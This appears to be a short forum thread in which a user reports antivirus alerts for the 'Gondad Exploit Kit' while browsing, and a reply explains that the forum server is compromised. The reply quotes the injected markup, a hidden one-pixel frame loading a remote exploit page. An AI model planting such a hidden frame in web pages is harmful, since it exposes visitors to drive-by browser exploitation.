AVG is identifying a threat from viewing this forum
Remember that forums.weddingbells.ca junk that was appended to every post recently? Now I'm getting notices that AVG is blocking "Exploit Gondad Exploit Kit (type 1935)" with file name "forums.weddingbells.ca/tmp/index.html" every time I view anything on the forums here.
It was suspicious when I saw the forums.weddingbells.ca stuff appended to every post, and now this is even worse... what's going on?
This server is compromised and attempts to exploit visitors' browsers
Clearly, an intruder installer malicious software on the server running this forum.
You can easily see it by the "<****** src=http://forums.weddingbells.ca/tmp/index.html width=1 height=1></******>" being included in the HTML source multiple times, with antivirus software detecting this as "Gondad Exploit Kit".
That malware apparently attempts to exploit multiple vulnerabilities in Flash, Java and others to take over the visitors' browsers.